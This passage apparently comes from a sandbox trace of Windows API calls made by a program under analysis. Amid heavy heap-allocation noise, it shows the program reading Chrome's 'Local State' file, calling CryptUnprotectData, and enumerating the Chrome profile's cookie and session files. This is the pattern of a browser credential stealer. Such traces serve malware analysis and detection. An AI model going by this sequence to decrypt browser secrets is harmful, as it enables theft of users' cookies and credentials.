0x4151f0 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126318 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x91507c8 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x68) returned 0x4ace10 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91507c8 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x98) returned 0x91000e0 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ace10 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x150) returned 0x913b418 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fd0 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175fa8 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f80 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x91507c8 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6a) returned 0x9124360 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91507c8 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9e) returned 0x48f6b8 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124360 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xec) returned 0x91372c0 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48f6b8 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x161) returned 0x4201d8 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91372c0 | out: hHeap=0x3f0000) returned 1 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91000e0 | out: hHeap=0x3f0000) returned 1 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x912d780 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4151f0 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0137.463] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x91507c8 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f30 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91507c8 | out: hHeap=0x3f0000) returned 1 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd8) returned 0x90d1020 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x138) returned 0x4231c0 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f30 | out: hHeap=0x3f0000) returned 1 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4231c0 | out: hHeap=0x3f0000) returned 1 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0137.464] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd6e8 [0137.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0137.464] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0x2020 [0137.464] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0137.465] GetFileSize (in: hFile=0x5cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1082a [0137.465] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1082a) returned 0x9193fe8 [0137.465] ReadFile (in: hFile=0x5cc, lpBuffer=0x9193fe8, nNumberOfBytesToRead=0x1082a, lpNumberOfBytesRead=0x36e098, lpOverlapped=0x0 | out: lpBuffer=0x9193fe8*, lpNumberOfBytesRead=0x36e098*=0x1082a, lpOverlapped=0x0) returned 1 [0137.519] CloseHandle (hObject=0x5cc) returned 1 [0137.519] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10853) returned 0x91a4820 [0137.520] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9193fe8 | out: hHeap=0x3f0000) returned 1 [0137.520] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91a4820 | out: hHeap=0x3f0000) returned 1 [0137.520] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.520] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x120) returned 0x4231c0 [0137.520] CryptUnprotectData (in: pDataIn=0x36e1a8, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x0, pDataOut=0x36e1a0 | out: ppszDataDescr=0x0, pDataOut=0x36e1a0) returned 1 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f30 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f08 [0137.575] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175ee0 [0137.575] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175ee0 | out: hHeap=0x3f0000) returned 1 [0137.575] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.575] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.575] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124360 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f08 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4151f0 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f08 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x91243d8 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f30 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4231c0 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124360 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x415210 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9175018 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x415210 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f30 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x9150818 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175018 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150818 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x401d10 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd8) returned 0x90d1020 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x138) returned 0x4231c0 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f30 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.576] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4231c0 | out: hHeap=0x3f0000) returned 1 [0137.576] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175f58 [0137.577] GetLocalTime (in: lpSystemTime=0x36dc98 | out: lpSystemTime=0x36dc98*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x6, wDay=0x13, wHour=0x9, wMinute=0xc, wSecond=0x2c, wMilliseconds=0x1ba)) [0137.577] SystemTimeToFileTime (in: lpSystemTime=0x36dc98, lpFileTime=0x36dca8 | out: lpFileTime=0x36dca8) returned 1 [0137.577] FileTimeToSystemTime (in: lpFileTime=0x36dc88, lpSystemTime=0x36dc70 | out: lpSystemTime=0x36dc70) returned 1 [0137.577] GetDesktopWindow () returned 0x10010 [0137.577] GetTickCount () returned 0x1153e39 [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.577] GetLastError () returned 0x0 [0137.577] SetLastError (dwErrCode=0x0) [0137.578] GetLastError () returned 0x0 [0137.578] SetLastError (dwErrCode=0x0) [0137.578] GetLastError () returned 0x0 [0137.578] SetLastError (dwErrCode=0x0) [0137.578] GetLastError () returned 0x0 [0137.578] SetLastError (dwErrCode=0x0) [0137.578] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126318 [0137.578] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x360) returned 0x912d780 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f58 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91243d8 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fd0 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175fa8 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175f80 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4201d8 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x913b418 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126348 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9145988 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e68 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150778 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c018 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91868a8 | out: hHeap=0x3f0000) returned 1 [0137.578] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150728 | out: hHeap=0x3f0000) returned 1 [0137.578] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x914ebe0, dwReserved1=0x1, cFileName="Cookies-journal", cAlternateFileName="COOKIE~1")) returned 1 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.579] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x914ebe0, dwReserved1=0x1, cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0137.579] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c3b6860, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3b6860, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b8f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x126, dwReserved0=0x914ebe0, dwReserved1=0x1, cFileName="Current Tabs", cAlternateFileName="CURREN~2")) returned 1 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.579] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x914ebe0, dwReserved1=0x1, cFileName="data_reduction_proxy_leveldb", cAlternateFileName="DATA_R~1")) returned 1 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e68 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.579] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.579] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124180 [0137.579] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.581] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.581] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="..", cAlternateFileName="")) returned 1 [0137.581] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="000003.log", cAlternateFileName="")) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124180 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa7) returned 0x91122c8 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.582] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124180 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa7) returned 0x9112378 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91122c8 | out: hHeap=0x3f0000) returned 1 [0137.582] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOCK", cAlternateFileName="")) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124180 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9112378 | out: hHeap=0x3f0000) returned 1 [0137.582] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="LOG", cAlternateFileName="")) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x91243d8 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.582] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x70) returned 0x9124180 [0137.582] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa7) returned 0x9112378 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124180 | out: hHeap=0x3f0000) returned 1 [0137.582] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91243d8 | out: hHeap=0x3f0000) returned 1 [0137.582] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x4231b8, dwReserved1=0x3f0000, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0137.582] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0137.583] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9112378 | out: 